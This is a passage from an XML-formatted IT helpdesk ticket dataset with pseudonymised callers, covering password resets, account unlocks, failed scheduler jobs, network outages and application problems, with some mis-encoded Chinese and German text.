    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1393 failed in job_scheduler at: 10/09/2016 10:55:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="resetting of erp password "/>
    <s v="_x000d__x000a__x000d__x000a_received from: ngjztqai.xqjzpvru@gmail.com_x000d__x000a__x000d__x000a_hi ,_x000d__x000a__x000d__x000a_request you to reset  my  erp password._x000d__x000a__x000d__x000a_"/>
    <s v="xgjkafcn uijphdyx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="dpozkmie vjuybcwz 27367 erp account locked"/>
    <s v="_x000d__x000a__x000d__x000a_received from: boithdfa.tojwnydh@gmail.com_x000d__x000a__x000d__x000a_please unlock account._x000d__x000a__x000d__x000a_"/>
    <s v="boithdfa tojwnydh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_1314 failed in job_scheduler at: 10/09/2016 09:38:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1314 failed in job_scheduler at: 10/09/2016 09:38:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="job snp_heu_1_regen failed in job_scheduler at: 10/09/2016 08:51:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job snp_heu_1_regen failed in job_scheduler at: 10/09/2016 08:51:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="HostName_977 :application tax_interface proc counts on node HostName_977 is critical&quot; "/>
    <s v=" the tax_interface webpage is reporting a : down status on, HostName_977. _x000d__x000a_application tax_interface proc counts on node HostName_977 is critical&quot; _x000d__x000a_ application tax_interface prod app server on node HostName_977 is dow"/>
    <s v="jyoqwxhz clhxsoqy"/>
    <x v="13"/>
  </r>
  <r>
    <s v="job Job_3051 failed in job_scheduler at: 10/09/2016 05:40:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3051 failed in job_scheduler at: 10/09/2016 05:40:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_3049 failed in job_scheduler at: 10/09/2016 05:30:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3049 failed in job_scheduler at: 10/09/2016 05:30:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="unable to create customers in engineering tool"/>
    <s v="name : ilhcgoqf xlibynvc_x000a_email : ilhcgoqf.xlibynvc@gmail.com_x000a_telephone : _x000a_summary : hello, i have problems with my engineering_tools. it is impossible to create a new customer."/>
    <s v="ilhcgoqf xlibynvc"/>
    <x v="25"/>
  </r>
  <r>
    <s v="job Job_3343 failed in job_scheduler at: 10/09/2016 04:30:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3343 failed in job_scheduler at: 10/09/2016 04:30:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="ç¬”è®°æœ¬é‡æ–°è£…ä¸‹ç³»ç»Ÿ"/>
    <s v="æŠŠæˆ‘çš„ç¬”è®°æœ¬é‡æ–°è£…ä¸‹ç³»ç»Ÿ"/>
    <s v="xjvubmlq vyamhjip"/>
    <x v="30"/>
  </r>
  <r>
    <s v="æœ‰ä¸€ä¸ªé“¾æŽ¥æ–‡ä»¶æ‰“ä¸å¼€"/>
    <s v="æœ‰ä¸€é“¾æŽ¥æ–‡ä»¶æ‰“ä¸å¼€ï¼Œæç¤ºç‰ˆæœ¬ä½Ž"/>
    <s v="qsfcxzel quwykhno"/>
    <x v="30"/>
  </r>
  <r>
    <s v="EU_tool - worklist is not available, confirmation is also not possible."/>
    <s v="the last worklist was created on friday, october 8th at 3:50 am."/>
    <s v="frzjtmyk wzacvhki"/>
    <x v="25"/>
  </r>
  <r>
    <s v="job Job_3343 failed in job_scheduler at: 10/09/2016 02:00:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3343 failed in job_scheduler at: 10/09/2016 02:00:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_3051 failed in job_scheduler at: 10/09/2016 01:08:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3051 failed in job_scheduler at: 10/09/2016 01:08:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job pp_EU_tool_netch_keheu1 failed in job_scheduler at: 10/09/2016 00:37:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job pp_EU_tool_netch_keheu1 failed in job_scheduler at: 10/09/2016 00:37:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_3049 failed in job_scheduler at: 10/09/2016 00:35:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3049 failed in job_scheduler at: 10/09/2016 00:35:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job mm_zscr0099_wkly_rollfgyuej1 failed in job_scheduler at: 10/09/2016 00:20:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job mm_zscr0099_wkly_rollfgyuej1 failed in job_scheduler at: 10/09/2016 00:20:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job pp_EU_tool_netch_ap1 failed in job_scheduler at: 10/09/2016 00:16:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job pp_EU_tool_netch_ap1 failed in job_scheduler at: 10/09/2016 00:16:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job pp_EU_tool_netch_ap2 failed in job_scheduler at: 10/09/2016 00:03:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job pp_EU_tool_netch_ap2 failed in job_scheduler at: 10/09/2016 00:03:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_452 failed in job_scheduler at: 10/08/2016 21:39:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_10/8/2016 9:38:53 pm :: unable to allocate processing resources. error: all backup proxies are offline or outdated _x000d__x000a__x000d__x000a__x000d__x000a_job Job_452 failed in job_scheduler at: 10/08/2016 21:39:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="customer accounts contact  list are not populating in crm dynamics"/>
    <s v="hello,_x000a_the issue: contacts that have been designated to track in crm are not showing up in crm and i'm not sure why. see the screen shots below_x000a_ _x000a__x000a_ _x000a__x000a_biyhll kthyarg_x000a_sales engineer - wc1 team_x000a__x000a_smhepfdn.aypgzieh@gmail.com_x000a_ _x000a__x000a_"/>
    <s v="smhepfdn aypgzieh"/>
    <x v="39"/>
  </r>
  <r>
    <s v="password resset request"/>
    <s v="from: rakthyesh ramdntythanjesh _x000a_sent: sunday, october 09, 2016 4:41 am_x000a_to: kzishqfu bmdawzoi_x000a_cc: tiyhum kuyiomar_x000a_subject: re: request to reset microsoft online services password for hgudmrta.vidzoqfl@gmail.com_x000a__x000a_dear dene,_x000a__x000a__x000a_â€¢ accounts status is  unlocked for user hgudmrta.vidzoqfl@gmail.com _x000a__x000a_please note the following url using which you can unlock all accounts and setup one single password for access across all systems from any other pc connected to the company network._x000a_ _x000a__x000a_ _x000a_for a step by step guide on how to use this site, click on the following link_x000a_ _x000a__x000a_ _x000a_let me know if you need more information or assistance on this matheywter._x000a__x000a__x000a_kind "/>
    <s v="hgudmrta vidzoqfl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password reset    request"/>
    <s v="password reset    request"/>
    <s v="wrdmxloh dshplynj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="distributor_tool npr error code"/>
    <s v="email screen shot of error.  duane said &quot;remember seeing a similar error during uacyltoe hxgayczeing that we resolved which had to do with the customer master. i think it had to do with a uacyltoe hxgaycze request and using the actual customer rather than the requester as the t&amp;d customer.&quot;_x000d__x000a__x000d__x000a_this npr is for a quote &amp; not a t&amp;d order._x000d__x000a_"/>
    <s v="fgaulydz crswlkev"/>
    <x v="21"/>
  </r>
  <r>
    <s v="job bkbackup_tool_powder_prod_full failed in job_scheduler at: 10/08/2016 18:36:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job bkbackup_tool_powder_prod_full failed in job_scheduler at: 10/08/2016 18:36:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="erp password reset"/>
    <s v="ic_x000d__x000a_ welcome, our next available agent will be with you shortly..._x000d__x000a_ interaction alerting agent._x000d__x000a_ website visitor has joined the conversation_x000d__x000a_rakthyesh ramdntythanjesh_x000d__x000a_ hi ramdntythanjesh_x000d__x000a_ramdntythanjesh_x000d__x000a_ hi rakthyesh_x000d__x000a_rakthyesh ramdntythanjesh_x000d__x000a_ "/>
    <s v="trixslny mbwishyo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="HostName_1015:volume: c:\ is over 85% space consumed. space available: 4.7 g"/>
    <s v="HostName_1015:volume: c:\ is over 85% space consumed. space available: 4.7 g"/>
    <s v="oldrctiu bxurpsyi"/>
    <x v="11"/>
  </r>
  <r>
    <s v="job Job_480 failed in job_scheduler at: 10/08/2016 13:38:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_480 failed in job_scheduler at: 10/08/2016 13:38:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="11"/>
  </r>
  <r>
    <s v="tax rate   mismatch  "/>
    <s v="_x000d__x000a__x000d__x000a_received from: ikerxqwz.prkyuitl@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_during the ongoing   internal audit  conducted by e&amp;y  , it was  observed that in list of   inwarehouse_tools attached , tax rate  was different from the one  updated  in the product hierarchy_x000d__x000a__x000d__x000a_request you to look into the reason  for few samples  and identify reasons   why incorrect  tax rate was captured  in inwarehouse_tool tax  and not as per product hierarchy ._x000d__x000a__x000d__x000a_also let us know whether   it   was system error ._x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="ikerxqwz prkyuitl"/>
    <x v="29"/>
  </r>
  <r>
    <s v="job Job_484 failed in job_scheduler at: 10/08/2016 12:11:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_484 failed in job_scheduler at: 10/08/2016 12:11:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="mobile device activation"/>
    <s v="from: ftnijxup sbltduco _x000d__x000a_sent: saturday, october 08, 2016 8:29 pm_x000d__x000a_to: nwfodmhc exurcwkm_x000d__x000a_subject: wg: die synchronisierung mit exchange activesync ist auf ihrem gerÃ¤t vorÃ¼bergehend blockiert, bis der zugriff vom administrator gewÃ¤hrt wird._x000d__x000a__x000d__x000a_help desk,_x000d__x000a_please take my new iphone 6s out of quarantine._x000d__x000a__x000d__x000a_"/>
    <s v="ftnijxup sbltduco"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp locked - please reset for nabjwvtd sprhouiv 27388"/>
    <s v="_x000d__x000a__x000d__x000a_received from: boithdfa.tojwnydh@gmail.com_x000d__x000a__x000d__x000a_"/>
    <s v="boithdfa tojwnydh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to see emails which are older than 30 days"/>
    <s v="unable to see emails which are older than 30 days"/>
    <s v="ntuhoafg bzwefjvk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 password reset"/>
    <s v="erp SID_34 password reset"/>
    <s v="oiudarbk ezhnjwdt"/>
    <x v="0"/>
  </r>
  <r>
    <s v="network outage: india, in- orelikon balzers coating india limited site is hard down since 7:42 am at 10/ 8 et "/>
    <s v="what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ___no______     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   ____7:42 am at 10/ 8 et _____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_no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x v="7"/>
  </r>
  <r>
    <s v="blank call // gso // loud noise"/>
    <s v="blank call // gso // loud noise"/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="telephone repair  pu-4 (shop floor 173 connection)"/>
    <s v="_x000a__x000a_received from: segvwfyn.mogtrevn@gmail.com_x000a__x000a_dear sir_x000a_request you to depute telephone  repair  person to pu-4 shop floor (173  shop floor connection)  as it not workingâ€¦._x000a__x000a_segvwfyn mogtrevn_x000a_assistant manager- manufacturing_x000a_segvwfyn.mogtrevn@gmail.com&lt;mailto:yuxloigj.tzfwjxhe@gmail.com&gt;_x000a__x000a__x000a_[cid:image009.jpg@01SID_35d8e.07ce5550]_x000a__x000a_"/>
    <s v="segvwfyn mogtrevn"/>
    <x v="18"/>
  </r>
  <r>
    <s v="call came and got disconnected"/>
    <s v="call came and got disconnected"/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="supply_chain_software password reset"/>
    <s v="from: ftnijxup sbltduco _x000d__x000a_sent: saturday, october 08, 2016 2:23 pm_x000d__x000a_to: qaohugxw kdeqjncw; nwfodmhc exurcwkm_x000d__x000a_subject: re: my access to supply_chain_software is blocked _x000d__x000a__x000d__x000a__x000d__x000a_help desk,_x000d__x000a_please check pathuick's account in supply_chain_software. _x000d__x000a__x000d__x000a_"/>
    <s v="qaohugxw kdeqjncw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="supply_chain_software password reset"/>
    <s v="supply_chain_software password reset_x000a__x000a_from: ftnijxup sbltduco _x000a_sent: saturday, october 08, 2016 2:21 pm_x000a_to: thsyrley shi; nwfodmhc exurcwkm_x000a_subject: re: ç­”å¤: finished: start of s&amp;op process_x000a__x000a_help desk,_x000a_please check thsyrley's account in supply_chain_software and assist for sign-on. _x000a__x000a_"/>
    <s v="qbzlfeva fmxwqugs"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 password reset"/>
    <s v="erp SID_34 password reset"/>
    <s v="iczltbdf cmvjhyxl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="usa plant - company-na-usa-usa-plant-bld1-qa-carb-2960-01-access-sw01 switch is down since 4:53am et on 10/08/16"/>
    <s v="usa plant - company-na-usa-usa-plant-bld1-qa-carb-2960-01-access-sw01 switch is down since 4:53am et on 10/08/16"/>
    <s v="dkmcfreg anwmfvlg"/>
    <x v="7"/>
  </r>
  <r>
    <s v="reset passwords for jvpkulxw ovuweygj using password_management_tool password reset."/>
    <s v="reset passwords for jvpkulxw ovuweygj using password_management_tool password reset."/>
    <s v="jvpkulxw ovuweygj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account got locked"/>
    <s v="account got locked"/>
    <s v="gwmspqeo vwfetaqg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="send e-mail from engineering tool doesn't work anymore"/>
    <s v="since feb / march 2016 it's not possible to send e-mail for the user details dialog anymore (e-mail address). it used to work before._x000d__x000a_that function is very helpful for the end user to contact the designer on issues/question directly from engineering tool without leaving engineering tool._x000d__x000a_see attachments (dialog and error message)"/>
    <s v="tghrloks jbgcvlmf"/>
    <x v="10"/>
  </r>
  <r>
    <s v="ms outlook2013 ä¸€ç›´æ˜¾ç¤ºæ­£åœ¨å¯åŠ¨ï¼Œä¸èƒ½æ˜¾ç¤ºæ­£å¸¸ç•Œé¢"/>
    <s v="please provide details of the issue._x000d__x000a_ms outlook2013 ä¸€ç›´æ˜¾ç¤ºæ­£åœ¨å¯åŠ¨ï¼Œä¸èƒ½æ˜¾ç¤ºæ­£å¸¸ç•Œé¢"/>
    <s v="molihtdq auprogsj"/>
    <x v="31"/>
  </r>
  <r>
    <s v="job Job_2080 failed in job_scheduler at: 10/08/2016 02:24:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_2080 failed in job_scheduler at: 10/08/2016 02:24:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="job Job_2039 failed in job_scheduler at: 10/08/2016 02:22:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_2039 failed in job_scheduler at: 10/08/2016 02:22:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="job Job_2074 failed in job_scheduler at: 10/08/2016 02:07:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_2074 failed in job_scheduler at: 10/08/2016 02:07:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="unable to do kis for dn 8058280136"/>
    <s v="_x000d__x000a__x000d__x000a_received from: gjtyswkb.dpvaymxr@gmail.com_x000d__x000a__x000d__x000a_dear it,_x000d__x000a__x000d__x000a_pls help to check dn 9169391247, we unable to do kis for this dn, "/>
    <s v="gjtyswkb dpvaymxr"/>
    <x v="17"/>
  </r>
  <r>
    <s v="job bkbackup_tool_reporting_tool_prod_full failed in job_scheduler at: 10/08/2016 01:12:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job bkbackup_tool_reporting_tool_prod_full failed in job_scheduler at: 10/08/2016 01:12:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="erp SID_34 account "/>
    <s v="_x000a__x000a_received from: zuxcfonv.nyhpkrbe@gmail.com_x000a__x000a_gso_x000a__x000a_please unlock and reset password for lij8syte ,also send password to jinxyhdi luji ,"/>
    <s v="zuxcfonv nyhpkrbe"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_1329 failed in job_scheduler at: 10/08/2016 00:11:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1329 failed in job_scheduler at: 10/08/2016 00:11:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="power outage: engineering_toolkuznetsk warehouse - (company) network is down since 10:52pm et on 10/07/2016"/>
    <s v="what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ____no_____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   ________10:52pm et on 10/07/2016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no_____     (yes/no/na) _x000d__x000a__x000d__x000a_8. remote dial-in ?   _____na______   (yes/no/na) _x000d__x000a__x000d__x000a_9. equipment reset ?    ______no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job Job_549 failed in job_scheduler at: 10/07/2016 23:05:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_549 failed in job_scheduler at: 10/07/2016 23:05:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_549 failed in job_scheduler at: 10/07/2016 23:05:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_549 failed in job_scheduler at: 10/07/2016 23:05:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="account is expired "/>
    <s v="_x000a__x000a_received from: zuxcfonv.nyhpkrbe@gmail.com_x000a__x000a_gso,_x000a__x000a_the account vvlixthy is expired , could you extend the account date to oct 8 2018 , jacyhky liuhyt is sponsor is jacyhky liuhyt , "/>
    <s v="zuxcfonv nyhpkrbe"/>
    <x v="19"/>
  </r>
  <r>
    <s v="account is locked "/>
    <s v="account is locked "/>
    <s v="jofvunqs uwigjmzv"/>
    <x v="31"/>
  </r>
  <r>
    <s v="ç­”å¤: password_management_tool "/>
    <s v="_x000a__x000a_received from: weqocbnu.eoixcpvy@gmail.com_x000a__x000a_hi  all_x000a__x000a__x000a_please reset my password for SID_78 for my entering error more than 3 times._x000a__x000a_user name : caoryhuq_x000a__x000a__x000a__x000a_æ—¥å¸¸ä¸šåŠ¡ï¼Œè¯·å‘é€è‡³south.service@company.com&lt;mailto:è¯·å‘é€è‡³south.service@company.com&gt;å…¬å…±é‚®ç®±_x000a__x000a_best "/>
    <s v="weqocbnu eoixcpvy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ç”µè„‘ç™»å½•å¯†ç å¿˜è®°ï¼Œé‡ç½®å¯†ç ã€‚"/>
    <s v="ç”µè„‘ç™»å½•å¯†ç å¿˜è®°ï¼Œé‡ç½®å¯†ç ã€‚"/>
    <s v="weqocbnu eoixcpvy"/>
    <x v="31"/>
  </r>
  <r>
    <s v="password reset using password_management_tool"/>
    <s v="password reset using password_management_tool"/>
    <s v="sxhqfaoe evobwgiy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="node usa pbx (10.1.19.200 ) located at usa is down since 7:14 pm et on 10/07."/>
    <s v="node usa pbx (10.1.19.200 ) located at usa is down since 7:14 pm et on 10/07."/>
    <s v="oldrctiu bxurpsyi"/>
    <x v="36"/>
  </r>
  <r>
    <s v="unable to save excel document"/>
    <s v="unable to save excel document"/>
    <s v="imoelsap gxdwkimv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to sync some files in collaboration_platform"/>
    <s v="unable to sync some files in collaboration_platform"/>
    <s v="xpzsygkb vbualmpr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update on inplant_867667"/>
    <s v="ticket update on inplant_867667"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update on inplant_867672"/>
    <s v="ticket update on inplant_867672"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to log in to engineering tool"/>
    <s v="unable to log in to engineering tool"/>
    <s v="ajdcnwtb bvijwxko"/>
    <x v="0"/>
  </r>
  <r>
    <s v="blue screen on start up"/>
    <s v="blue screen on start up"/>
    <s v="qwijaspo ukynmfig"/>
    <x v="2"/>
  </r>
  <r>
    <s v="unable to sign in to skype meeting"/>
    <s v="unable to sign in to skype meeting"/>
    <s v="kijgcwlh gfejlcvb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook not opening up: stuck on loading screen "/>
    <s v="outlook not opening up: stuck on loading screen "/>
    <s v="vitpjxgm zxiqkrns"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vpn issue "/>
    <s v="_x000a_telephone:_x000a_summary:i cannot get vpn to connect on my computer."/>
    <s v="lfikjasz tjbqcmvl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="engineering_tool and infopath issue"/>
    <s v="sqlcuhep railgnfb called in for an issue where he was unable to launch engineering_tool and unable to fill up a discount form."/>
    <s v="sqlcuhep railgnfb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to view mails more than 3 days"/>
    <s v="unable to view mails more than 3 days"/>
    <s v="owlgqjme qhcozdfx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="jabra headset issue"/>
    <s v="i needed a hand setting up jabra pro headset for skype calls. i have installed drivers, just not sure what else needs to be done._x000a_contact # : "/>
    <s v="uazkjifp dhtnevcq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unlock account  email  in cell phone the user vhjkdqop tkhafgrc id:sanchrtyn"/>
    <s v="hello team,_x000a__x000a_could you please unlock account  email  in cell phone the user vhjkdqop tkhafgrc id: sanchrtyn ?_x000a__x000a_"/>
    <s v="qasdhyzm yuglsrwx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="qhjkxoyw lgiovknd called as he wanted to speak to tiyhum kuyiomar"/>
    <s v="qhjkxoyw lgiovknd called as he wanted to speak to tiyhum kuyiomar"/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to log in to supply_chain_software"/>
    <s v="unable to log in to supply_chain_software"/>
    <s v="tgewaniq yepifgbl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="call from vythytalyst : uploading group of contacts to crm"/>
    <s v="call from vythytalyst : uploading group of contacts to crm issue_x000a_contact # : _x000a_while synchronizing contacts from outlook to crm _x000a_1&gt; its not synchronizing complete list of contacts._x000a_2&gt;its moving those contacts from outlook and keeping in crm"/>
    <s v="gxiytpjh yibsguwk"/>
    <x v="39"/>
  </r>
  <r>
    <s v="need this fixed "/>
    <s v="_x000a__x000a_received from: oetlgbfw.bsctrnwp@gmail.com_x000a__x000a_i don't have access to below_x000a__x000a__x000a__x000a_prerequisites:_x000a__x000a_you must have the infopath filler client to complete and submit the lra form.  please contact the gsc and open a remedy ticket for the pc support group if you do not have the infopath filler client._x000a__x000a_to determine if you have the infopath filler client, click on the start button and choose all programdntys._x000a__x000a_click on microsoft office group, you should see the microsoft infopath filler client:_x000a__x000a__x000a_dthyan matheywtyuews_x000a_sales manager gl2_x000a_oetlgbfw.bsctrnwp@gmail.com&lt;mailto:oetlgbfw.bsctrnwp@gmail.com&gt;_x000a__x000a__x000a__x000a__x000a__x000a__x000a_"/>
    <s v="oetlgbfw bsctrnwp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to open engineering_tool application"/>
    <s v="unable to open engineering_tool application"/>
    <s v="tgewaniq yepifgbl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="engineering tool issue"/>
    <s v="engineering tool issue"/>
    <s v="mwebfhdz csndrxgi"/>
    <x v="0"/>
  </r>
  <r>
    <s v="business_client : .net error message "/>
    <s v="business_client : .net error message "/>
    <s v="kjeqxayu bpwkdazl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to enter mileage details. site not loading."/>
    <s v="unable to enter mileage details"/>
    <s v="rqtmpjdb ohitelsg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticketing_tool issue - cannot seem to create a new subtask from the ticketing_tool console. "/>
    <s v="ticketing_tool issue - cannot seem to create a new subtask from the ticketing_tool console. the area to create a new sub-task  seems to be missing.  we were asked to create separate tasks for server decommissioning and neither me nor ron mcgee can seem to create a sub-task on a ticket any more. "/>
    <s v="slzhuipc sqntcber"/>
    <x v="0"/>
  </r>
  <r>
    <s v="client is having issues with excel crashing"/>
    <s v="client is having issues with excel crashing"/>
    <s v="etvendormhd xpslzunb"/>
    <x v="2"/>
  </r>
  <r>
    <s v="hpqc uacyltoe hxgaycze installation "/>
    <s v="_x000a_summary:i need help downloading a uacyltoe hxgaycze application, can someone take over my screen and help me out?"/>
    <s v="hajworze jqpisura"/>
    <x v="0"/>
  </r>
  <r>
    <s v="subbathykrisyuhnyrt shhuivashankar company provided phone activation"/>
    <s v="subbathykrisyuhnyrt shhuivashankar company provided phone activation"/>
    <s v="olckhmvx pcqobjnd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update on inplant_867618"/>
    <s v="ticket update on inplant_867618"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to access easyterritory map view builder"/>
    <s v="unable to access easyterritory map view builder"/>
    <s v="itslpwra vybdkuoa"/>
    <x v="22"/>
  </r>
  <r>
    <s v="crm : voucher - email resend issue"/>
    <s v="when attempting to email a voucher following the standard procedure, i enter the email address and press &quot;send email&quot; and the page goes completely blank.  i then need to resign onto SID_39, and the email has not been sent._x000d__x000a__x000d__x000a_please review and correct aerp."/>
    <s v="pfzxecbo ptygkvzl"/>
    <x v="14"/>
  </r>
  <r>
    <s v="erp SID_34 account unlock"/>
    <s v="erp SID_34 account unlock"/>
    <s v="wvqgbdhm fwchqjor"/>
    <x v="0"/>
  </r>
  <r>
    <s v="passwort geoyhurg chriuimjiann"/>
    <s v="_x000a__x000a_received from: nsoikcyf.jhybqael@gmail.com_x000a__x000a_bitte schalten sie meine passwÃ¶rter frei._x000a_plase unlook my password_x000a_chrithysgd_x000a__x000a__x000a__x000a_mit freundlichen grÃ¼ÃŸen / best "/>
    <s v="nsoikcyf jhybqael"/>
    <x v="0"/>
  </r>
  <r>
    <s v="external recipient is unable to share screen with internal company employees during pstn conference call"/>
    <s v="external recipient is unable to share screen with internal company employees during pstn conference call_x000d__x000a__x000d__x000a_error message: all company users saw a message that read something like &quot;presentation failed since the presenter has left the meeting&quot; even though he was still in the meeting. we agreed to end the meeting once and re-join but the issue didn't go away._x000d__x000a__x000d__x000a_"/>
    <s v="dqgjxhrt kydnpacx"/>
    <x v="26"/>
  </r>
  <r>
    <s v="account unlock"/>
    <s v="account unlock"/>
    <s v="zidcxslw clyfdaki"/>
    <x v="0"/>
  </r>
  <r>
    <s v="general query "/>
    <s v="general query "/>
    <s v="zfliqpxm dgfvaqlh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job bkbackup_tool_HostName_770_prod_inc failed in job_scheduler at: 10/07/2016 11:48:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job bkbackup_tool_HostName_770_prod_inc failed in job_scheduler at: 10/07/2016 11:48:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="need converion tool : export a pdf into excel. "/>
    <s v="_x000a_summary:hello,_x000a_i saw on pdf options that it's possible to export a pdf into excel._x000a_do you know who can i contact in company to get this conversion tool?_x000a_"/>
    <s v="gxuvbcpr libcktnm"/>
    <x v="32"/>
  </r>
  <r>
    <s v="browser issue : etime: flash player issue/addin issue "/>
    <s v="browser issue : etime: flash player issue/addin issue "/>
